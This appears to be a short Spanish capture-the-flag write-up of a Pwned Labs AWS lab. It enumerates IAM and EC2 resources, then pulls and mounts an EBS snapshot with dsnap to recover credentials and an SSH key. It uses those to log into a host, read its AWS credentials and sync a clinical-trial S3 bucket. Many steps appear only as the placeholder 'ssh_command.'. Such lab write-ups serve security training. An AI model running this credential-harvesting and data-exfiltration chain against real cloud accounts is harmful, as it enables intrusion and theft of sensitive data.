Caído del cielo

Caído del cielo


Aws PwnedLabs

Vamos a ver los usuarios que podemos encontrar.

ssh_command.

Ahora vemos las politicas customizadas.

ssh_command.

Tenemos dos instancias corriendo. Admin y web-prod.

ssh_command.

Desafortunadamente no tenemos permisos en los s3.

ssh_command.

Podemos ver los AMI en el cual haru es el dueno.

ssh_command.

Snapshots de haru.

ssh_command.

ssh_command.

Configuramos el usuario con su secreto.

ssh_command.

vim ~/.aws/configure

ssh_command.

pipx install 'dsnap[cli]'

ssh_command.

dsnap --profile haru --region us-east-1 get snap-0beab05dd8e4e1e22

ssh_command.

make docker/build

ssh_command.

sudo docker run -it -v "/opt/dsnap/snap-0beab05dd8e4e1e22.img:/disks/snap-0c241b0d00d234853.img" -w /disks dsnap-mount --ro -a "snap-0beab05dd8e4e1e22.img" -m /dev/sda1:/

ssh_command.

Encontramos las credenciales del usuario

ssh_command.

Tambien podemos ver los tokens.

ssh_command.

Vemos que la ip es la de web-prod

ssh_command.

Nos dirigimos a la consola y vemos la ip publica.

ssh_command.

chmod 600 id_rsa

ssh -i id_rsa nacer@44.208.228.94

ssh_command.

cat ~/.aws/credentials

ssh_command.

aws s3 ls s3://mp-clinical-trial-data --profile nacer

ssh_command.

aws s3 sync s3://mp-clinical-trial-data mp-clinical-trial-data --profile nacer

ssh_command.

cat flag.txt

ssh_command.

© 2026 Cu3rv0x